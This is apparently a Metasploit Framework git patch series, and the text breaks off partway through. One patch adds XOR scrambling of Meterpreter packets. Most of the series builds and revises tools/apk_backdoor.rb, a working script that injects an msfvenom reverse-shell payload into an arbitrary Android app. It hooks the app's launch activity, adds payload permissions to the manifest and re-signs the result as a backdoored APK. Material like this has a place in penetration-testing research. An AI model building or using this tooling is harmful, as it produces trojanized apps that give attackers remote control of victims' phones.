From c747ffc05adda299fdf000be25a20bd71c72e043 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:36:26 +1000 Subject: [PATCH 01/71] Implement support for TLV packet XORing, and RECV removal --- lib/rex/post/meterpreter/packet.rb | 38 +++++++++++++++++++ lib/rex/post/meterpreter/packet_dispatcher.rb | 4 +- lib/rex/post/meterpreter/packet_parser.rb | 20 +++++++--- .../post/meterpreter/packet_parser_spec.rb | 2 +- 4 files changed, 55 insertions(+), 9 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 459fb2d4bb..423f8880d2 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -665,6 +665,44 @@ class Packet < GroupTlv end end + # + # Override the function that creates the raw byte stream for + # sending so that it generates an XOR key, uses it to scramble + # the serialized TLV content, and then returns the key plus the + # scrambled data as the payload. + # + def to_r + raw = super + xor_key = rand(254) + 1 + xor_key |= (rand(254) + 1) << 8 + xor_key |= (rand(255) + 1) << 16 + xor_key |= (rand(255) + 1) << 24 + result = [xor_key].pack('N') + xor_bytes(xor_key, raw) + result + end + + # + # Override the function that reads from a raw byte stream so + # that the XORing of data is included in the process prior to + # passing it on to the default functionality that can parse + # the TLV values. + # + def from_r(bytes) + xor_key = bytes[0,4].unpack('N')[0] + super(xor_bytes(xor_key, bytes[4, bytes.length])) + end + + # + # Xora set of bytes with a given DWORD xor key. + # + def xor_bytes(xor_key, bytes) + result = '' + bytes.bytes.zip([xor_key].pack('V').bytes.cycle).each do |b| + result << (b[0].ord ^ b[1].ord).chr + end + result + end + ## # # Conditionals diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index cfcd7576fc..bf1a00e80d 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -108,8 +108,7 @@ module PacketDispatcher self.last_checkin = Time.now - # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue - if req.body[0,4] == "RECV" + if req.method == 'GET' rpkt = send_queue.shift resp.body = rpkt || '' begin @@ -170,6 +169,7 @@ module PacketDispatcher end end + if bytes.to_i == 0 # Mark the session itself as dead self.alive = false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 8aebe3de39..c4c93d6b37 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -12,6 +12,11 @@ module Meterpreter ### class PacketParser + # 4 byte xor + # 4 byte length + # 4 byte type + HEADER_SIZE = 12 + # # Initializes the packet parser context with an optional cipher. # @@ -26,7 +31,7 @@ class PacketParser # def reset self.raw = '' - self.hdr_length_left = 8 + self.hdr_length_left = HEADER_SIZE self.payload_length_left = 0 end @@ -34,6 +39,9 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) + # Create a typeless packet + packet = Packet.new(0) + if (self.hdr_length_left > 0) buf = sock.read(self.hdr_length_left) @@ -49,7 +57,10 @@ class PacketParser # payload length left to the number of bytes # specified in the length if (self.hdr_length_left == 0) - self.payload_length_left = raw.unpack("N")[0] - 8 + xor_key = raw[0, 4].unpack('N')[0] + length_bytes = packet.xor_bytes(xor_key, raw[4, 4]) + # header size doesn't include the xor key, which is always tacked on the front + self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4) end elsif (self.payload_length_left > 0) buf = sock.read(self.payload_length_left) @@ -67,14 +78,11 @@ class PacketParser if ((self.hdr_length_left == 0) && (self.payload_length_left == 0)) - # Create a typeless packet - packet = Packet.new(0) - # TODO: cipher decryption if (cipher) end - # Serialize the packet from the raw buffer + # Deserialize the packet from the raw buffer packet.from_r(self.raw) # Reset our state diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 9ffa2f1a46..af39577024 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -20,7 +20,7 @@ describe Rex::Post::Meterpreter::PacketParser do it "should initialise with expected defaults" do parser.send(:raw).should == "" - parser.send(:hdr_length_left).should == 8 + parser.send(:hdr_length_left).should == 12 parser.send(:payload_length_left).should == 0 end From ed49a67c8b4c0fe739e7226debc47bcacce4b966 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:59:57 +1000 Subject: [PATCH 02/71] Add .php and .py meterpreter excludes to gitignore --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index 532dcce24a..e83ddb0b91 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,8 @@ external/source/exploits/**/Release # Avoid checking in Meterpreter binaries. These are supplied upstream by # the metasploit-payloads gem. data/meterpreter/*.dll +data/meterpreter/*.php +data/meterpreter/*.py data/meterpreter/*.bin data/meterpreter/*.jar data/meterpreter/*.lso From e4e8930ccb1a605e3c53404ff47605a35721e1b4 Mon Sep 17 00:00:00 2001 From: Jack64 Date: Thu, 3 Sep 2015 19:30:25 +0100 Subject: [PATCH 03/71] APK Backdooring script Originally @ https://github.com/rapid7/metasploit-framework/pull/5611/ PR'ed again because I accidentally deleted my fork and couldn't make changes. --- tools/apk_backdoor.rb | 232 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 232 insertions(+) create mode 100644 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb new file mode 100644 index 0000000000..cb2ac12298 --- /dev/null +++ b/tools/apk_backdoor.rb @@ -0,0 +1,232 @@ +#!/usr/bin/env ruby +# +# This script is a POC for injecting metasploit payloads on +# arbitrary APKs. +# Authored by timwr, Jack64 +# + + +require 'nokogiri' +require 'fileutils' +require 'optparse' + +# Find the activity that is opened when you click the app icon +def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end +end + +# If XML parsing of the manifest fails, recursively search +# the smali code for the onCreate() hook and let the user +# pick the injection point +def scrape_files_for_launcher_activity() + smali_files||=[] + Dir.glob('original/smali*/**/*.smali') do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] +end + +def fix_manifest() + payload_permissions=[] + + #Load payload's permissions + File.open("payload/AndroidManifest.xml","r"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + # print "#{k}" + } + original_permissions=[] + apk_mani='' + + #Load original apk's permissions + File.open("original/AndroidManifest.xml","r"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + # print "#{k}" + } + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } +end + +apkfile = ARGV[0] +unless(apkfile && File.readable?(apkfile)) + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + exit(1) +end + +jarsigner = `which jarsigner` +unless(jarsigner && jarsigner.length > 0) + puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) +end + +apktool = `which apktool` +unless(apktool && apktool.length > 0) + puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" + exit(1) +end + +apk_v=`apktool` +unless(apk_v.split()[1].include?("v2.")) + puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" + exit(1) +end + +begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } +rescue + puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) +end + + + +print "[*] Generating msfvenom payload..\n" +res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +if res.downcase.include?("invalid" || "error") + puts res + exit(1) +end + +print "[*] Signing payload..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` + +`rm -rf original` +`rm -rf payload` + +`cp #{apkfile} original.apk` + +print "[*] Decompiling orignal APK..\n" +`apktool d $(pwd)/original.apk -o $(pwd)/original` +print "[*] Decompiling payload APK..\n" +`apktool d $(pwd)/payload.apk -o $(pwd)/payload` + +f = File.open("original/AndroidManifest.xml") +amanifest = Nokogiri::XML(f) +f.close + +print "[*] Locating onCreate() hook..\n" + + +launcheractivity = find_launcher_activity(amanifest) +smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +begin + activitysmali = File.read(smalifile) +rescue Errno::ENOENT + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity() + smalifile=results[0] + activitysmali=results[1] + rescue + puts "[-] Error finding launcher activity. Exiting" + exit(1) + end +end + +print "[*] Copying payload files..\n" +FileUtils.mkdir_p('original/smali/com/metasploit/stage/') +FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +activitycreate = ';->onCreate(Landroid/os/Bundle;)V' +payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" +hookedsmali = activitysmali.gsub(activitycreate, payloadhook) +print "[*] Loading ",smalifile," and injecting payload..\n" +File.open(smalifile, "w") {|file| file.puts hookedsmali } +injected_apk=apkfile.split(".")[0] +injected_apk+="_backdoored.apk" + +print "[*] Poisoning the manifest with meterpreter permissions..\n" +fix_manifest() + +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` +print "[*] Signing #{injected_apk} ..\n" +`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` + +puts "[+] Infected file #{injected_apk} ready.\n" From 764dc0ceb4f2fe8eb39d330a8d49ee7fad726dca Mon Sep 17 00:00:00 2001 From: Jack64 Date: Sun, 6 Sep 2015 02:02:42 +0100 Subject: [PATCH 04/71] Several fixes - Added tempdir - Fixed msfvenom call (now calling ../msfvenom instead of msfvenom) - Removed backticks for command execution (thanks @bcook-r7) --- tools/apk_backdoor.rb | 95 +++++++++++++++++++++++++------------------ 1 file changed, 55 insertions(+), 40 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index cb2ac12298..1854e8c29e 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -5,10 +5,22 @@ # Authored by timwr, Jack64 # - +require 'tmpdir' require 'nokogiri' require 'fileutils' require 'optparse' +require 'open3' + + +def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end +end + # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) @@ -36,9 +48,10 @@ end # If XML parsing of the manifest fails, recursively search # the smali code for the onCreate() hook and let the user # pick the injection point -def scrape_files_for_launcher_activity() + +def scrape_files_for_launcher_activity(tempdir) smali_files||=[] - Dir.glob('original/smali*/**/*.smali') do |file| + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| checkFile=File.read(file) if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") smali_files << file @@ -72,11 +85,11 @@ def scrape_files_for_launcher_activity() return [smalifile,activitysmali] end -def fix_manifest() +def fix_manifest(tempdir) payload_permissions=[] - + #Load payload's permissions - File.open("payload/AndroidManifest.xml","r"){|file| + File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| k=File.read(file) payload_manifest=Nokogiri::XML(k) permissions = payload_manifest.xpath("//manifest/uses-permission") @@ -84,13 +97,13 @@ def fix_manifest() name=permission.attribute("name") payload_permissions << name.to_s end - # print "#{k}" } + original_permissions=[] - apk_mani='' - + apk_mani="" + #Load original apk's permissions - File.open("original/AndroidManifest.xml","r"){|file2| + File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k original_manifest=Nokogiri::XML(k) @@ -99,8 +112,8 @@ def fix_manifest() name=permission.attribute("name") original_permissions << name.to_s end - # print "#{k}" } + #Get permissions that are not in original APK add_permissions=[] for permission in payload_permissions @@ -109,6 +122,7 @@ def fix_manifest() add_permissions << permission end end + inject=0 new_mani="" #Inject permissions in original APK's manifest @@ -123,29 +137,29 @@ def fix_manifest() new_mani << line+"\n" end end - File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } end apkfile = ARGV[0] unless(apkfile && File.readable?(apkfile)) puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" exit(1) end -jarsigner = `which jarsigner` -unless(jarsigner && jarsigner.length > 0) +jarsigner = run_cmd("jarsigner") +unless(jarsigner != nil) puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" exit(1) end -apktool = `which apktool` -unless(apktool && apktool.length > 0) +apktool = run_cmd("apktool") +unless(apktool != nil) puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v=`apktool` +apk_v = apktool unless(apk_v.split()[1].include?("v2.")) puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" exit(1) @@ -160,48 +174,45 @@ begin } rescue puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" + puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" puts "[-] Error parsing msfvenom options. Exiting.\n" exit(1) end - +#Create temporary directory where work will be done +tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` +res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) end -print "[*] Signing payload..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` +print "[*] Signing payload..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") -`rm -rf original` -`rm -rf payload` - -`cp #{apkfile} original.apk` +run_cmd("cp #{apkfile} #{tempdir}/original.apk") print "[*] Decompiling orignal APK..\n" -`apktool d $(pwd)/original.apk -o $(pwd)/original` +run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" -`apktool d $(pwd)/payload.apk -o $(pwd)/payload` - -f = File.open("original/AndroidManifest.xml") +run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + +f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close print "[*] Locating onCreate() hook..\n" - launcheractivity = find_launcher_activity(amanifest) -smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali' +smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT print "[!] Unable to find correct hook automatically\n" begin - results=scrape_files_for_launcher_activity() + results=scrape_files_for_launcher_activity(tempdir) smalifile=results[0] activitysmali=results[1] rescue @@ -211,8 +222,8 @@ rescue Errno::ENOENT end print "[*] Copying payload files..\n" -FileUtils.mkdir_p('original/smali/com/metasploit/stage/') -FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/' +FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") +FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) @@ -222,11 +233,15 @@ injected_apk=apkfile.split(".")[0] injected_apk+="_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest() +fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` -print "[*] Signing #{injected_apk} ..\n" -`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` +run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +print "[*] Signing #{injected_apk} ..\n" +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") + +run_cmd("cp #{tempdir}/#{injected_apk} .") +FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" + From 18e0a2f8966f9ac7032cf91300a03f01c78e8198 Mon Sep 17 00:00:00 2001 From: Jack64 Date: Sun, 6 Sep 2015 02:34:33 +0100 Subject: [PATCH 05/71] Update apk_backdoor.rb fixed msfvenom path resolution --- tools/apk_backdoor.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1854e8c29e..f280520064 100644 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -183,7 +183,8 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -res = run_cmd("../msfvenom -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("invalid" || "error") puts res exit(1) From 719b333e96fa24d92cc293abf411dd9977342e93 Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 18:41:58 +0100 Subject: [PATCH 06/71] chmod +x tools/apk_backdoor.rb --- tools/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 tools/apk_backdoor.rb diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb old mode 100644 new mode 100755 From 322382060561e7eaddc7ed640c09a6f4ff05497e Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:08:06 +0100 Subject: [PATCH 07/71] fix tools/apk_backdoor.rb output file --- tools/apk_backdoor.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index f280520064..aa311f713b 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -230,18 +230,16 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "w") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] -injected_apk+="_backdoored.apk" +injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -run_cmd("apktool b -o #{tempdir}/#{injected_apk} #{tempdir}/original") +run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") print "[*] Signing #{injected_apk} ..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/#{injected_apk} androiddebugkey") +run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") -run_cmd("cp #{tempdir}/#{injected_apk} .") FileUtils.remove_entry tempdir puts "[+] Infected file #{injected_apk} ready.\n" From e5fb67f430e2138f7e4a6adc4f07bccee8c9e2cf Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 19:15:23 +0100 Subject: [PATCH 08/71] fix version check > 2.0.1 --- tools/apk_backdoor.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index aa311f713b..1e81f5e885 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -149,19 +149,19 @@ end jarsigner = run_cmd("jarsigner") unless(jarsigner != nil) - puts "[-] Jarsigner not found. If it's not in your PATH, please add it.\n" + puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" exit(1) end -apktool = run_cmd("apktool") +apktool = run_cmd("apktool -version") unless(apktool != nil) - puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" + puts "[-] apktool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v = apktool -unless(apk_v.split()[1].include?("v2.")) - puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" +apk_v = Gem::Version.new(apktool) +unless(apk_v >= Gem::Version.new('2.0.1')) + puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" exit(1) end From ab4ebe155dd6d7060bd8ff4e617338c9a46824da Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 27 Sep 2015 12:20:04 +0100 Subject: [PATCH 09/71] placate msftidy --- tools/apk_backdoor.rb | 290 +++++++++++++++++++++--------------------- 1 file changed, 145 insertions(+), 145 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1e81f5e885..18401b380d 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -1,6 +1,6 @@ #!/usr/bin/env ruby # -# This script is a POC for injecting metasploit payloads on +# This script is a POC for injecting metasploit payloads on # arbitrary APKs. # Authored by timwr, Jack64 # @@ -13,36 +13,36 @@ require 'open3' def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end end # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') - unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end end # If XML parsing of the manifest fails, recursively search @@ -50,133 +50,133 @@ end # pick the injection point def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] end def fix_manifest(tempdir) - payload_permissions=[] + payload_permissions=[] - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } - original_permissions=[] - apk_mani="" + original_permissions=[] + apk_mani="" - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? "uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end apkfile = ARGV[0] -unless(apkfile && File.readable?(apkfile)) - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - exit(1) +unless apkfile && File.readable?(apkfile) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + exit(1) end jarsigner = run_cmd("jarsigner") -unless(jarsigner != nil) - puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) +unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) end apktool = run_cmd("apktool -version") -unless(apktool != nil) - puts "[-] apktool not found. If it's not in your PATH, please add 